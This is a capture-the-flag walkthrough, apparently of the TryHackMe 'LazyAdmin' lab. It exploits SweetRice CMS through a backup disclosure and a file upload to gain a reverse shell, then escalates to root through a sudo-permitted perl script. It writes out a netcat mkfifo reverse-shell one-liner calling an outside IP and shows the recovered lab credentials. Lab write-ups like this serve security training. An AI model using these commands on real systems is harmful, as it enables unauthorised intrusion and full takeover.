LazyAdmin

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.144.123

Detailed Nmap Scan :‌

Command Breakdown:‌

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 22,80 -oN nmap 10.10.144.123

Enumeration

Lets go visit the website.

Its an apache2 default page, the source code gives us nothing. Lets use a tool called "gobuster" to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.144.123/

We found a directory called /content, lets go visit it.

Looks like the website is running on a software called SweetRice , so lets search for exploits on searchsploit.

searchsploit sweetrice 

We find few vulnerabilities, I'm going to try the Backup disclosure one first as it might give us a lot of information about past usernames and passwords and a lot more.

Lets copy the exploit to our directory and read it.

searchsploit -m php/webapps/40718.txt

After reading through the exploit, its telling us to visit/inc/mysql_backup to find backup files.

Lets go visit that page.

We find a file, lets download it. Once downloaded , lets read it. Reading through it, we find a username and password.

We found a password, but that doesn't look like a password, so I think we need to crack it and find the real password, that can be done using a site called crackstation

And we found the password.

Now , we need to find a login page to login with these credentials, lets run a gobuster on the /content/ directory to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.144.123/content

Visiting the /as directory , we find the login page.

Lets login with the credentials we found.

Username: manager

Password: Password123

And we are logged in!

Looking through the website, we can see multiple upload pages, but the Media Center page looks interesting as we can see what files we can upload.

But first we need to find a vulnerability, so lets go to searchsploit again and search for vulnerabilities.

searchsploit sweetrice

We can see that there is a vulnerability called Arbitrary File Upload, lets used that, first we need to copy it to our directory.

searchsploit -m php/webapps/40716.py

Reading through the exploit, its looks like we can upload a shell.php5 file with a reverse shell, and get a reverse shell.

We can get a reverse shell from pentestmonkey. Copy the reverse shell to your machine and then change the IP to your IP and the Port to 1234 in the exploit and change the name of the file to shell.php5

Once the file is uploaded start a Netcat reverse shell.

nc -lvnp 1234

And now click the file on the website and you get a reverse shell.

Now you can go and read the user.txt file which is the answer to the first question in /home/itguy

Privilege Escalation

In the home directory of itguy, we can also see a file called backup.pl , lets see what it says.

It looks like it is running the file called copy.sh , so what if we can add a reverse shell to the file and start a listener to get a reverse shell as root as the file is owned by root.

Lets echo our reverse shell with our IP and port to this file, we can find the reverse shell on pentestmonkey.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 4321 >/tmp/f" > copy.sh

After that we need to run the file, but first we need to check what we can run as root, we can find that out by using the command sudo -l.

Looks like we can run the file. So lets run it, before that we need to start a reverse shell listener.

nc -lvnp 4321

Once we use the command we get a reverse shell

sudo /usr/bin/perl /home/itguy/backup.pl

Now you can get the root flag in /root and answer the last question of this room.

Last updated